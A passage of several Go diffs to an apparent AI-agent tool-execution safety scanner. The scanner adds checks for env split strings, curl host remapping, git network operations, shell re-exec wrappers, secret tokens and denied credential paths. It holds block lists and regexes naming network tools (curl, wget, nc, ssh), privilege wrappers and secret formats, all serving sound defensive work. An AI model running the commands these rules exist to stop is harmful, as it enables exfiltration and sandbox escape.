+	var raw map[string]any
+	switch ext {
 	case ".json":
-		err = json.Unmarshal(b, &p)
+		err = json.Unmarshal(b, &raw)
 	default:
-		err = yaml.Unmarshal(b, &p)
+		err = yaml.Unmarshal(b, &raw)
 	}
 	if err != nil {
 		return Policy{}, err
@@ -154,6 +155,39 @@ func LoadPolicy(path string) (Policy, error) {
 		p.denyOnParseErrorSet = true
 	}
 	return p, nil
+}
+
+func decodePolicy(data []byte, ext string, policy *Policy) error {
+	if ext == ".json" {
+		decoder := json.NewDecoder(bytes.NewReader(data))
+		decoder.DisallowUnknownFields()
+		if err := decoder.Decode(policy); err != nil {
+			return err
+		}
+		if err := decoder.Decode(&struct{}{}); !errors.Is(err, io.EOF) {
+			if err == nil {
+				return errors.New("policy must contain a single JSON object")
+			}
+			return err
+		}
+		return nil
+	}
+	if len(bytes.TrimSpace(data)) == 0 {
+		return nil
+	}
+
+	decoder := yaml.NewDecoder(bytes.NewReader(data))
+	decoder.KnownFields(true)
+	if err := decoder.Decode(policy); err != nil {
+		return err
+	}
+	if err := decoder.Decode(&struct{}{}); !errors.Is(err, io.EOF) {
+		if err == nil {
+			return errors.New("policy must contain a single YAML document")
+		}
+		return err
+	}
+	return nil
 }
 
 func (p Policy) withDefaults() Policy {
@@ -214,10 +248,12 @@ type Request struct {
 	Metadata       ToolMetadata      `json:"metadata,omitempty"`
 	Backend        string            `json:"backend,omitempty"`
 	TimeoutSeconds int               `json:"timeout_seconds,omitempty"`
-	MaxOutputBytes int64             `json:"max_output_bytes,omitempty"`
-	Background     bool              `json:"background,omitempty"`
-	TTY            bool              `json:"tty,omitempty"`
-	CodeBlocks     []CodeBlock       `json:"code_blocks,omitempty"`
+	// MaxOutputBytes is a caller-declared execution cap. A scan validates the
+	// value but does not truncate executor output itself.
+	MaxOutputBytes int64       `json:"max_output_bytes,omitempty"`
+	Background     bool        `json:"background,omitempty"`
+	TTY            bool        `json:"tty,omitempty"`
+	CodeBlocks     []CodeBlock `json:"code_blocks,omitempty"`
 }
 
 // Finding is one matched safety rule.
@@ -387,13 +423,14 @@ func (s scanner) scanRequestEnvelope(req Request) []Finding {
 				"session id and cleanup plan.",
 		))
 	}
-	if req.TimeoutSeconds > s.policy.MaxTimeoutSeconds {
+	timeoutSeconds := effectiveTimeoutSeconds(req)
+	if timeoutSeconds > s.policy.MaxTimeoutSeconds {
 		findings = append(findings, newFinding(
 			DecisionDeny,
 			RiskHigh,
 			"resource.timeout_exceeded",
 			[]string{fmt.Sprintf("timeout %ds exceeds policy max %ds",
-				req.TimeoutSeconds, s.policy.MaxTimeoutSeconds)},
+				timeoutSeconds, s.policy.MaxTimeoutSeconds)},
 			"Use a shorter timeout or update the safety policy after review.",
 		))
 	}
@@ -408,6 +445,13 @@ func (s scanner) scanRequestEnvelope(req Request) []Finding {
 		))
 	}
 	return findings
+}
+
+func effectiveTimeoutSeconds(req Request) int {
+	if req.Backend == BackendHostExec && req.TimeoutSeconds <= 0 {
+		return hostexec.DefaultTimeoutSeconds
+	}
+	return req.TimeoutSeconds
 }
 
 func (s scanner) reportFromFindings(
@@ -586,18 +630,6 @@ func (s scanner) scanParsedCommands(pipe *shellsafe.Pipeline) []Finding {
 		if len(argv) == 0 {
 			continue
 		}
-		name := commandName(argv[0])
-		full := strings.Join(argv, " ")
-		findings = append(findings, s.scanDeniedCommand(name)...)
-		if len(s.policy.AllowedCommands) > 0 && !s.commandAllowed(argv[0]) {
-			findings = append(findings, newFinding(
-				DecisionDeny,
-				RiskMedium,
-				"policy.command_not_allowed",
-				[]string{fmt.Sprintf("command %q is not in allowed_commands", argv[0])},
-				"Use an allowed command or update allowed_commands in the policy.",
-			))
-		}
 		if containsEnvSplitString(argv) {
 			findings = append(findings, newFinding(
 				DecisionDeny,
@@ -608,15 +640,36 @@ func (s scanner) scanParsedCommands(pipe *shellsafe.Pipeline) []Finding {
 					"command and arguments directly.",
 			))
 		}
-		findings = append(findings, s.scanDangerousCommand(name, argv)...)
-		findings = append(findings, s.scanReviewCommand(full)...)
-		for _, effective := range commandChain(argv)[1:] {
+		chain := commandChain(argv)
+		for _, effective := range chain {
 			effectiveName := commandName(effective[0])
 			findings = append(findings, s.scanDeniedCommand(effectiveName)...)
+			if len(s.policy.AllowedCommands) > 0 &&
+				!s.commandAllowed(effective[0]) {
+				findings = append(findings, newFinding(
+					DecisionDeny,
+					RiskMedium,
+					"policy.command_not_allowed",
+					[]string{fmt.Sprintf(
+						"command %q is not in allowed_commands", effective[0])},
+					"Use an allowed command or update allowed_commands in the policy.",
+				))
+			}
 			findings = append(findings,
 				s.scanDangerousCommand(effectiveName, effective)...)
 			findings = append(findings,
 				s.scanReviewCommand(strings.Join(effective, " "))...)
+		}
+		last := chain[len(chain)-1]
+		if isUnresolvedReexecWrapper(commandName(last[0])) {
+			findings = append(findings, newFinding(
+				DecisionDeny,
+				RiskHigh,
+				"shell.unresolved_wrapper",
+				[]string{fmt.Sprintf(
+					"command wrapper %q cannot be inspected reliably", last[0])},
+				"Pass the effective command directly or use an audited workspace script.",
+			))
 		}
 		findings = append(findings, s.scanDeniedPaths(argv)...)
 	}
@@ -647,7 +700,7 @@ func (s scanner) scanDangerousCommand(name string, argv []string) []Finding {
 			"Do not run recursive forced deletion through tool execution.",
 		))
 	}
-	if name == "chmod" && containsArg(argv, "-R") {
+	if name == "chmod" && recursiveChmod(argv) {
 		findings = append(findings, newFinding(
 			DecisionNeedsHumanReview,
 			RiskHigh,
@@ -657,6 +710,22 @@ func (s scanner) scanDangerousCommand(name string, argv []string) []Finding {
 		))
 	}
 	return findings
+}
+
+func recursiveChmod(argv []string) bool {
+	for _, arg := range argv[1:] {
+		if arg == "--" {
+			return false
+		}
+		if arg == "--recursive" || strings.HasPrefix(arg, "--recursive=") {
+			return true
+		}
+		if strings.HasPrefix(arg, "-") && !strings.HasPrefix(arg, "--") &&
+			strings.ContainsRune(arg[1:], 'R') {
+			return true
+		}
+	}
+	return false
 }
 
 func destructiveRM(argv []string) bool {
@@ -798,10 +867,20 @@ func normalizePathForMatch(path string) string {
 func (s scanner) scanNetwork(command string) []Finding {
 	var findings []Finding
 	networkCommand := networkCommandRE.MatchString(command)
+	var remapTargets []string
+	unresolvedRemap := false
 	if pipe, err := shellsafe.Parse(command); err == nil {
 		for _, argv := range pipe.Commands {
 			if containsNetworkCommand(argv) {
 				networkCommand = true
+			}
+			for _, effective := range commandChain(argv) {
+				if commandName(effective[0]) != "curl" {
+					continue
+				}
+				targets, unresolved := curlRemapTargets(effective)
+				remapTargets = append(remapTargets, targets...)
+				unresolvedRemap = unresolvedRemap || unresolved
 			}
 		}
 	}
@@ -809,6 +888,7 @@ func (s scanner) scanNetwork(command string) []Finding {
 	if networkCommand {
 		targets = extractURLs(command)
 	}
+	targets = append(targets, remapTargets...)
 	checkedHosts := make(map[string]struct{})
 	for _, raw := range targets {
 		host := hostOf(raw)
@@ -838,7 +918,110 @@ func (s scanner) scanNetwork(command string) []Finding {
 			"Review the target manually or provide an explicit whitelisted URL.",
 		))
 	}
+	if unresolvedRemap {
+		findings = append(findings, newFinding(
+			DecisionNeedsHumanReview,
+			RiskHigh,
+			"network.unresolved_curl_remap",
+			[]string{"curl remapping option has no reliably parseable replacement target"},
+			"Review --connect-to and --resolve values manually or remove the remapping option.",
+		))
+	}
 	return findings
+}
+
+func curlRemapTargets(argv []string) ([]string, bool) {
+	var targets []string
+	unresolved := false
+	for i := 1; i < len(argv); i++ {
+		option, value, matched := curlRemapOption(argv[i])
+		if !matched {
+			continue
+		}
+		if value == "" {
+			if i+1 >= len(argv) {
+				unresolved = true
+				continue
+			}
+			i++
+			value = argv[i]
+		}
+		parsed, ok := parseCurlRemapValue(option, value)
+		if !ok {
+			unresolved = true
+			continue
+		}
+		targets = append(targets, parsed...)
+	}
+	return targets, unresolved
+}
+
+func curlRemapOption(arg string) (string, string, bool) {
+	for _, option := range []string{"--connect-to", "--resolve"} {
+		if arg == option {
+			return option, "", true
+		}
+		if strings.HasPrefix(arg, option+"=") {
+			return option, strings.TrimPrefix(arg, option+"="), true
+		}
+	}
+	return "", "", false
+}
+
+func parseCurlRemapValue(option, value string) ([]string, bool) {
+	parts := splitOutsideBrackets(value, ':')
+	switch option {
+	case "--connect-to":
+		if len(parts) != 4 {
+			return nil, false
+		}
+		if parts[2] == "" {
+			return nil, true
+		}
+		return []string{parts[2]}, true
+	case "--resolve":
+		if strings.HasPrefix(value, "-") {
+			return nil, true
+		}
+		if len(parts) != 3 || parts[2] == "" {
+			return nil, false
+		}
+		addresses := strings.Split(strings.TrimPrefix(parts[2], "+"), ",")
+		for _, address := range addresses {
+			if address == "" {
+				return nil, false
+			}
+		}
+		return addresses, true
+	default:
+		return nil, false
+	}
+}
+
+func splitOutsideBrackets(value string, separator byte) []string {
+	parts := make([]string, 0, 4)
+	start := 0
+	bracketDepth := 0
+	for i := 0; i < len(value); i++ {
+		switch value[i] {
+		case '[':
+			bracketDepth++
+		case ']':
+			if bracketDepth == 0 {
+				return nil
+			}
+			bracketDepth--
+		default:
+			if value[i] == separator && bracketDepth == 0 {
+				parts = append(parts, value[start:i])
+				start = i + 1
+			}
+		}
+	}
+	if bracketDepth != 0 {
+		return nil
+	}
+	return append(parts, value[start:])
 }
 
 func extractURLs(s string) []string {
@@ -948,6 +1131,11 @@ func unwrapCommand(argv []string) []string {
 		return unwrapOptionCommand(argv, true)
 	}
 	return argv
+}
+
+func isUnresolvedReexecWrapper(name string) bool {
+	_, ok := unresolvedReexecWrappers[name]
+	return ok
 }
 
 func unwrapEnvCommand(argv []string) []string {
@@ -1242,8 +1430,69 @@ func (s scanner) scanCodeBlock(req Request, block CodeBlock) []Finding {
 			"Review code that bridges from code execution into shell execution.",
 		))
 	}
+	findings = append(findings, s.scanCodePaths(code)...)
 	findings = append(findings, s.scanNetwork(code)...)
+	findings = append(findings, s.scanCodeNetwork(code)...)
 	findings = append(findings, s.scanResourcePatterns(lower)...)
+	return findings
+}
+
+func (s scanner) scanCodePaths(code string) []Finding {
+	var findings []Finding
+	for _, literal := range codeStringLiterals(code) {
+		if !s.pathDenied(literal) {
+			continue
+		}
+		findings = append(findings, newFinding(
+			DecisionDeny,
+			RiskCritical,
+			"sensitive.path_access",
+			[]string{fmt.Sprintf("code block references denied path %q", literal)},
+			"Do not access system paths, SSH material, credentials, or secrets from code execution.",
+		))
+	}
+	return findings
+}
+
+func codeStringLiterals(code string) []string {
+	matches := codeStringLiteralRE.FindAllStringSubmatch(code, -1)
+	literals := make([]string, 0, len(matches))
+	for _, match := range matches {
+		for _, candidate := range match[1:] {
+			if candidate != "" {
+				literals = append(literals, candidate)
+				break
+			}
+		}
+	}
+	return literals
+}
+
+func (s scanner) scanCodeNetwork(code string) []Finding {
+	var findings []Finding
+	checkedHosts := make(map[string]struct{})
+	for _, match := range codeNetworkCallRE.FindAllStringSubmatch(code, -1) {
+		if len(match) != 2 || strings.Contains(match[1], "://") {
+			continue
+		}
+		host := hostOf(match[1])
+		if host == "" {
+			continue
+		}
+		if _, ok := checkedHosts[host]; ok {
+			continue
+		}
+		checkedHosts[host] = struct{}{}
+		if !s.hostAllowed(host) {
+			findings = append(findings, newFinding(
+				DecisionDeny,
+				RiskHigh,
+				"network.non_whitelisted_domain",
+				[]string{fmt.Sprintf("domain %q is not in network_allowlist", host)},
+				"Use a whitelisted domain or update network_allowlist after review.",
+			))
+		}
+	}
 	return findings
 }
 
@@ -1437,18 +1686,12 @@ func commandToken(name string) string {
 func commandName(name string) string {
 	name = strings.TrimSpace(strings.Trim(name, `"'`))
 	name = strings.ReplaceAll(name, "\\", "/")
-	base := filepath.Base(name)
+	base := strings.ToLower(filepath.Base(name))
 	base = strings.TrimSuffix(base, ".exe")
 	base = strings.TrimSuffix(base, ".cmd")
 	base = strings.TrimSuffix(base, ".bat")
 	base = strings.TrimSuffix(base, ".com")
-	return strings.ToLower(base)
-}
-
-func containsArg(argv []string, want string) bool {
-	return slices.ContainsFunc(argv, func(arg string) bool {
-		return arg == want
-	})
+	return base
 }
 
 func newFinding(
@@ -1468,6 +1711,15 @@ func newFinding(
 }
 
 var (
+	unresolvedReexecWrappers = map[string]struct{}{
+		"sh": {}, "bash": {}, "zsh": {}, "ash": {}, "dash": {},
+		"ksh": {}, "mksh": {}, "fish": {}, "pwsh": {}, "powershell": {},
+		"cmd": {}, "busybox": {}, "toybox": {}, "eval": {}, "exec": {},
+		"source": {}, ".": {}, "builtin": {}, "xargs": {}, "sudo": {},
+		"su": {}, "doas": {}, "setsid": {}, "unshare": {}, "chroot": {},
+		"runuser": {}, "time": {}, "ionice": {}, "taskset": {}, "stdbuf": {},
+		"strace": {}, "ltrace": {}, "script": {}, "flock": {},
+	}
 	networkCommandRE = regexp.MustCompile(
 		`(?i)(?:^|[;&|]\s*)["']?(?:(?:[a-z]:)?[^\s"';&|]*[/\\])?(?:curl|wget|nc|netcat|ssh|scp|rsync)(?:\.exe|\.cmd|\.bat|\.com)?["']?(?:\s|$)`)
 	explicitURLRE = regexp.MustCompile(
@@ -1490,6 +1742,10 @@ var (
 		`(?i)(sk-[A-Za-z0-9_-]{12,}|ghp_[A-Za-z0-9_]{12,}|xox[baprs]-[A-Za-z0-9-]{10,}|-----BEGIN [A-Z ]*PRIVATE KEY-----)`)
 	secretNameValueRE = regexp.MustCompile(
 		`(?i)(api[_-]?key|token|password|passwd|secret|private[_-]?key|credential)=([^ \t\n\r;&|]+)`)
+	codeStringLiteralRE = regexp.MustCompile(
+		`(?s)(?:"((?:\\.|[^"\\])*)"|'((?:\\.|[^'\\])*)')`)
+	codeNetworkCallRE = regexp.MustCompile(
+		`(?i)\b(?:socket\.(?:create_connection|getaddrinfo)|[a-z_][a-z0-9_]*\.connect|http\.client\.(?:http|https)connection)\s*\(\s*\(?\s*["']([^"']+)["']`)
 )
 
 func looksSensitive(text string) bool {

--- a/tool/safety/safety.go
+++ b/tool/safety/safety.go
@@ -606,6 +606,16 @@ func (s scanner) scanParsedCommands(pipe *shellsafe.Pipeline) []Finding {
 				"Use an allowed command or update allowed_commands in the policy.",
 			))
 		}
+		if containsEnvSplitString(argv) {
+			findings = append(findings, newFinding(
+				DecisionDeny,
+				RiskCritical,
+				"shell.env_split_string",
+				[]string{"env split-string can hide an arbitrary command payload"},
+				"Do not use env -S or --split-string in tool commands; pass the "+
+					"command and arguments directly.",
+			))
+		}
 		findings = append(findings, s.scanDangerousCommand(name, argv)...)
 		findings = append(findings, s.scanReviewCommand(full)...)
 		findings = append(findings, s.scanDeniedPaths(argv)...)
@@ -820,7 +830,17 @@ func (s scanner) scanNetwork(command string) []Finding {
 
 func extractURLs(s string) []string {
 	targets := explicitURLRE.FindAllString(s, -1)
-	return append(targets, schemeLessNetworkTargetRE.FindAllString(s, -1)...)
+	remaining := make([]string, 0, len(strings.Fields(s)))
+	for _, field := range strings.Fields(s) {
+		clean := strings.Trim(field, `"'`)
+		if match := scpLikeNetworkTargetRE.FindStringSubmatch(clean); len(match) == 2 {
+			targets = append(targets, match[1])
+			continue
+		}
+		remaining = append(remaining, field)
+	}
+	return append(targets,
+		schemeLessNetworkTargetRE.FindAllString(strings.Join(remaining, " "), -1)...)
 }
 
 func hostOf(raw string) string {
@@ -835,9 +855,45 @@ func hostOf(raw string) string {
 	return strings.ToLower(u.Hostname())
 }
 
-func isNetworkCommand(name string) bool {
-	switch name {
+func isNetworkCommand(argv []string) bool {
+	if len(argv) == 0 {
+		return false
+	}
+	switch commandName(argv[0]) {
 	case "curl", "wget", "nc", "netcat", "ssh", "scp", "rsync":
+		return true
+	case "git":
+		return isGitNetworkOperation(argv)
+	default:
+		return false
+	}
+}
+
+func isGitNetworkOperation(argv []string) bool {
+	for i := 1; i < len(argv); i++ {
+		arg := strings.ToLower(argv[i])
+		if gitGlobalOptionHasValue(arg) {
+			i++
+			continue
+		}
+		if strings.HasPrefix(arg, "-") {
+			continue
+		}
+		switch arg {
+		case "clone", "fetch", "pull", "push", "ls-remote", "submodule":
+			return true
+		case "remote":
+			return slices.Contains(argv[i+1:], "update")
+		default:
+			return false
+		}
+	}
+	return false
+}
+
+func gitGlobalOptionHasValue(arg string) bool {
+	switch arg {
+	case "-c", "-C", "--git-dir", "--work-tree", "--namespace", "--config-env":
 		return true
 	default:
 		return false
@@ -846,7 +902,7 @@ func isNetworkCommand(name string) bool {
 
 func containsNetworkCommand(argv []string) bool {
 	for depth := 0; depth < 8 && len(argv) > 0; depth++ {
-		if isNetworkCommand(commandName(argv[0])) {
+		if isNetworkCommand(argv) {
 			return true
 		}
 		next := unwrapCommand(argv)
@@ -874,6 +930,9 @@ func unwrapCommand(argv []string) []string {
 }
 
 func unwrapEnvCommand(argv []string) []string {
+	if envSplitStringRequested(argv) {
+		return nil
+	}
 	for i := 1; i < len(argv); {
 		arg := argv[i]
 		if arg == "-u" || arg == "--unset" || arg == "-C" || arg == "--chdir" {
@@ -887,6 +946,64 @@ func unwrapEnvCommand(argv []string) []string {
 		return argv[i:]
 	}
 	return nil
+}
+
+func containsEnvSplitString(argv []string) bool {
+	for depth := 0; depth < 8 && len(argv) > 0; depth++ {
+		if commandName(argv[0]) == "env" && envSplitStringRequested(argv) {
+			return true
+		}
+		next := unwrapCommand(argv)
+		if len(next) == 0 || len(next) == len(argv) {
+			return false
+		}
+		argv = next
+	}
+	return false
+}
+
+func envSplitStringRequested(argv []string) bool {
+	for i := 1; i < len(argv); {
+		arg := argv[i]
+		if arg == "--" {
+			return false
+		}
+		if isEnvSplitStringOption(arg) {
+			return true
+		}
+		if arg == "-u" || arg == "--unset" || arg == "-C" || arg == "--chdir" {
+			i += 2
+			continue
+		}
+		if strings.HasPrefix(arg, "-") || strings.Contains(arg, "=") {
+			i++
+			continue
+		}
+		return false
+	}
+	return false
+}
+
+func isEnvSplitStringOption(arg string) bool {
+	if arg == "--split-string" || strings.HasPrefix(arg, "--split-string=") {
+		return true
+	}
+	if !strings.HasPrefix(arg, "-") || strings.HasPrefix(arg, "--") {
+		return false
+	}
+	for _, option := range arg[1:] {
+		switch option {
+		case 'S':
+			return true
+		case 'u', 'C':
+			return false
+		case 'i', '0', 'v':
+			continue
+		default:
+			return false
+		}
+	}
+	return false
 }
 
 func unwrapOptionCommand(argv []string, optionHasValue bool) []string {
@@ -1341,6 +1458,8 @@ var (
 		`(?i)https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+`)
 	schemeLessNetworkTargetRE = regexp.MustCompile(
 		`(?i)\b(?:(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}|(?:[0-9]{1,3}\.){3}[0-9]{1,3}|localhost)(?::[0-9]{1,5})?(?:/[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]*)?`)
+	scpLikeNetworkTargetRE = regexp.MustCompile(
+		`(?i)^(?:[a-z0-9._-]+@)?((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}|(?:[0-9]{1,3}\.){3}[0-9]{1,3}|localhost):.+$`)
 	longSleepRE   = regexp.MustCompile(`\bsleep\s+([0-9]+)`)
 	headBytesRE   = regexp.MustCompile(`\bhead\s+-c\s+([0-9]+)`)
 	printRepeatRE = regexp.MustCompile(

--- a/tool/safety/safety.go
+++ b/tool/safety/safety.go
@@ -1216,22 +1216,15 @@ func unwrapEnvCommand(argv []string) []string {
 			}
 			return nil
 		}
-		if arg == "-u" || arg == "--unset" || arg == "-C" || arg == "--chdir" ||
-			arg == "-a" || arg == "--argv0" {
+		if envOptionConsumesNext(arg) {
 			i += 2
 			continue
 		}
-		if strings.HasPrefix(arg, "--unset=") || strings.HasPrefix(arg, "--chdir=") ||
-			strings.HasPrefix(arg, "--argv0=") ||
-			(strings.HasPrefix(arg, "-u") && len(arg) > 2) ||
-			(strings.HasPrefix(arg, "-C") && len(arg) > 2) ||
-			(strings.HasPrefix(arg, "-a") && len(arg) > 2) {
+		if isAttachedEnvValueOption(arg) {
 			i++
 			continue
 		}
-		if arg == "-i" || arg == "--ignore-environment" || arg == "-0" ||
-			arg == "--null" || arg == "-v" || arg == "--debug" ||
-			strings.Contains(arg, "=") {
+		if isEnvFlag(arg) || strings.Contains(arg, "=") {
 			i++
 			continue
 		}
@@ -1241,6 +1234,33 @@ func unwrapEnvCommand(argv []string) []string {
 		return argv[i:]
 	}
 	return nil
+}
+
+func envOptionConsumesNext(arg string) bool {
+	switch arg {
+	case "-u", "--unset", "-C", "--chdir", "-a", "--argv0":
+		return true
+	default:
+		return false
+	}
+}
+
+func isAttachedEnvValueOption(arg string) bool {
+	return strings.HasPrefix(arg, "--unset=") ||
+		strings.HasPrefix(arg, "--chdir=") ||
+		strings.HasPrefix(arg, "--argv0=") ||
+		(strings.HasPrefix(arg, "-u") && len(arg) > 2) ||
+		(strings.HasPrefix(arg, "-C") && len(arg) > 2) ||
+		(strings.HasPrefix(arg, "-a") && len(arg) > 2)
+}
+
+func isEnvFlag(arg string) bool {
+	switch arg {
+	case "-i", "--ignore-environment", "-0", "--null", "-v", "--debug":
+		return true
+	default:
+		return false
+	}
 }
 
 func containsEnvSplitString(argv []string) bool {

--- a/tool/safety/safety.go
+++ b/tool/safety/safety.go
@@ -523,6 +523,16 @@ func (s scanner) scanRequestEnvelope(req Request) []Finding {
 		))
 	}
 	timeoutSeconds := effectiveTimeoutSeconds(req)
+	if !req.InteractiveWrite && req.Backend == BackendCodeExec &&
+		timeoutSeconds < 0 {
+		findings = append(findings, newFinding(
+			DecisionDeny,
+			RiskHigh,
+			"resource.unbounded_timeout",
+			[]string{"code execution has no finite timeout"},
+			"Configure a finite code-execution timeout before allowing the tool.",
+		))
+	}
 	if !req.InteractiveWrite && timeoutSeconds > s.policy.MaxTimeoutSeconds {
 		findings = append(findings, newFinding(
 			DecisionDeny,
@@ -686,7 +696,7 @@ func (s scanner) scanShell(req Request, command string) []Finding {
 		))
 		return findings
 	}
-	findings = append(findings, s.scanParsedCommands(pipe)...)
+	findings = append(findings, s.scanParsedCommands(req, pipe)...)
 	return findings
 }
 
@@ -742,7 +752,10 @@ func hasWindowsCmdSyntax(command string) bool {
 	return windowsCmdExpansionRE.MatchString(command) || strings.Contains(command, "^")
 }
 
-func (s scanner) scanParsedCommands(pipe *shellsafe.Pipeline) []Finding {
+func (s scanner) scanParsedCommands(
+	req Request,
+	pipe *shellsafe.Pipeline,
+) []Finding {
 	var findings []Finding
 	for _, argv := range pipe.Commands {
 		if s.canceled() {
@@ -768,6 +781,19 @@ func (s scanner) scanParsedCommands(pipe *shellsafe.Pipeline) []Finding {
 			}
 			effectiveName := commandName(effective[0])
 			findings = append(findings, s.scanDeniedCommand(effectiveName)...)
+			if req.Backend == BackendHostExec &&
+				isWindowsCommandReexecutor(effectiveName) {
+				findings = append(findings, newFinding(
+					DecisionDeny,
+					RiskHigh,
+					"shell.windows_cmd_builtin",
+					[]string{fmt.Sprintf(
+						"command %q is a cmd.exe command re-execution builtin",
+						effective[0],
+					)},
+					"Pass the effective command directly without cmd.exe start or call.",
+				))
+			}
 			if i == len(chain)-1 && shellsafe.IsImplicitlyDenied(effectiveName) {
 				findings = append(findings, newFinding(
 					DecisionDeny,
@@ -817,6 +843,10 @@ func (s scanner) scanParsedCommands(pipe *shellsafe.Pipeline) []Finding {
 		findings = append(findings, s.scanDeniedPaths(argv)...)
 	}
 	return findings
+}
+
+func isWindowsCommandReexecutor(name string) bool {
+	return name == "start" || name == "call"
 }
 
 // scanInlineInterpreter routes source passed through an interpreter switch such

--- a/tool/safety/safety.go
+++ b/tool/safety/safety.go
@@ -12,6 +12,7 @@ package safety
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"errors"
 	"fmt"
@@ -28,6 +29,7 @@ import (
 
 	"gopkg.in/yaml.v3"
 
+	"trpc.group/trpc-go/trpc-agent-go/codeexecutor"
 	"trpc.group/trpc-go/trpc-agent-go/internal/shellsafe"
 	"trpc.group/trpc-go/trpc-agent-go/tool"
 	"trpc.group/trpc-go/trpc-agent-go/tool/hostexec"
@@ -76,18 +78,29 @@ type Policy struct {
 	MaxTimeoutSeconds int      `json:"max_timeout_seconds,omitempty" yaml:"max_timeout_seconds,omitempty"`
 	// MaxOutputBytes validates a cap declared by the request. Executors remain
 	// responsible for enforcing that cap while collecting output.
-	MaxOutputBytes       int64    `json:"max_output_bytes,omitempty" yaml:"max_output_bytes,omitempty"`
-	EnvAllowlist         []string `json:"env_allowlist,omitempty" yaml:"env_allowlist,omitempty"`
-	ReviewCommands       []string `json:"review_commands,omitempty" yaml:"review_commands,omitempty"`
-	ReviewShellPipelines bool     `json:"review_shell_pipelines,omitempty" yaml:"review_shell_pipelines,omitempty"`
-	DenyOnParseError     bool     `json:"deny_on_parse_error,omitempty" yaml:"deny_on_parse_error,omitempty"`
+	MaxOutputBytes int64    `json:"max_output_bytes,omitempty" yaml:"max_output_bytes,omitempty"`
+	EnvAllowlist   []string `json:"env_allowlist,omitempty" yaml:"env_allowlist,omitempty"`
+	ReviewCommands []string `json:"review_commands,omitempty" yaml:"review_commands,omitempty"`
+	// ReviewShellPipelines defaults to true. Start with DefaultPolicy before
+	// assigning false in programmatic configuration.
+	ReviewShellPipelines bool `json:"review_shell_pipelines,omitempty" yaml:"review_shell_pipelines,omitempty"`
+	// DenyOnParseError defaults to true. Start with DefaultPolicy before
+	// assigning false in programmatic configuration.
+	DenyOnParseError bool `json:"deny_on_parse_error,omitempty" yaml:"deny_on_parse_error,omitempty"`
+	// UnknownToolAction controls how PermissionPolicy handles a tool for which
+	// no built-in or registered request parser is available. Supported values
+	// are allow, ask, and deny. The default is ask; invalid programmatic values
+	// fail closed, while LoadPolicy rejects them.
+	UnknownToolAction tool.PermissionAction `json:"unknown_tool_action,omitempty" yaml:"unknown_tool_action,omitempty"`
 
 	reviewShellPipelinesSet bool
 	denyOnParseErrorSet     bool
 }
 
 // DefaultPolicy returns a conservative policy suitable for workspaceexec,
-// hostexec and codeexec wrappers.
+// hostexec and codeexec wrappers. Programmatic callers should modify the
+// returned value, rather than a Policy literal, when setting a default-true
+// boolean to false.
 func DefaultPolicy() Policy {
 	return Policy{
 		DeniedCommands: []string{
@@ -111,6 +124,7 @@ func DefaultPolicy() Policy {
 		MaxOutputBytes:       4 * 1024 * 1024,
 		ReviewShellPipelines: true,
 		DenyOnParseError:     true,
+		UnknownToolAction:    tool.PermissionActionAsk,
 		ReviewCommands: []string{
 			"go install", "npm install", "npm ci", "pip install",
 			"pip3 install", "apt install", "apt-get install",
@@ -156,6 +170,14 @@ func LoadPolicy(path string) (Policy, error) {
 	}
 	if _, ok := raw["deny_on_parse_error"]; ok {
 		p.denyOnParseErrorSet = true
+	}
+	if !validUnknownToolAction(p.UnknownToolAction) {
+		return Policy{}, fmt.Errorf(
+			"unknown_tool_action must be %q, %q, or %q",
+			tool.PermissionActionAllow,
+			tool.PermissionActionAsk,
+			tool.PermissionActionDeny,
+		)
 	}
 	return p, nil
 }
@@ -222,7 +244,21 @@ func (p Policy) withDefaults() Policy {
 	if !p.denyOnParseErrorSet && !p.DenyOnParseError {
 		p.DenyOnParseError = d.DenyOnParseError
 	}
+	if p.UnknownToolAction == "" {
+		p.UnknownToolAction = d.UnknownToolAction
+	}
 	return p
+}
+
+func validUnknownToolAction(action tool.PermissionAction) bool {
+	switch action {
+	case tool.PermissionActionAllow,
+		tool.PermissionActionAsk,
+		tool.PermissionActionDeny:
+		return true
+	default:
+		return false
+	}
 }
 
 // ToolMetadata is the framework tool metadata contract, reused so that guard
@@ -231,11 +267,8 @@ func (p Policy) withDefaults() Policy {
 // parallel type to update.
 type ToolMetadata = tool.ToolMetadata
 
-// CodeBlock is a script block supplied to a code execution tool.
-type CodeBlock struct {
-	Language string `json:"language,omitempty"`
-	Code     string `json:"code,omitempty"`
-}
+// CodeBlock is the codeexecutor code block contract.
+type CodeBlock = codeexecutor.CodeBlock
 
 // Request describes one pending tool execution.
 type Request struct {
@@ -372,16 +405,35 @@ func AppendAuditFile(path string, report Report) error {
 
 // Scan evaluates a pending tool execution against the policy.
 func Scan(req Request, policy Policy) Report {
-	start := time.Now()
-	policy = policy.withDefaults()
-	s := scanner{policy: policy}
-	report := s.scan(req)
-	report.DurationMillis = time.Since(start).Milliseconds()
+	report, _ := scanContext(context.Background(), req, policy)
 	return report
 }
 
+func scanContext(ctx context.Context, req Request, policy Policy) (Report, error) {
+	start := time.Now()
+	if ctx == nil {
+		ctx = context.Background()
+	}
+	if err := ctx.Err(); err != nil {
+		return Report{}, err
+	}
+	policy = policy.withDefaults()
+	s := scanner{ctx: ctx, policy: policy}
+	report := s.scan(req)
+	if err := ctx.Err(); err != nil {
+		return Report{}, err
+	}
+	report.DurationMillis = time.Since(start).Milliseconds()
+	return report, nil
+}
+
 type scanner struct {
+	ctx    context.Context
 	policy Policy
+}
+
+func (s scanner) canceled() bool {
+	return s.ctx != nil && s.ctx.Err() != nil
 }
 
 func (s scanner) scan(req Request) Report {
@@ -389,11 +441,26 @@ func (s scanner) scan(req Request) Report {
 	cmd := requestCommand(req)
 	findings := make([]Finding, 0, 4)
 	findings = append(findings, s.scanMetadata(req)...)
+	if s.canceled() {
+		return Report{}
+	}
 	findings = append(findings, s.scanEnv(req.Env)...)
+	if s.canceled() {
+		return Report{}
+	}
 	findings = append(findings, s.scanRequestEnvelope(req)...)
+	if s.canceled() {
+		return Report{}
+	}
 	findings = append(findings, s.scanStdin(req)...)
+	if s.canceled() {
+		return Report{}
+	}
 	if len(req.CodeBlocks) > 0 {
 		for _, block := range req.CodeBlocks {
+			if s.canceled() {
+				return Report{}
+			}
 			findings = append(findings, s.scanCodeBlock(req, block)...)
 		}
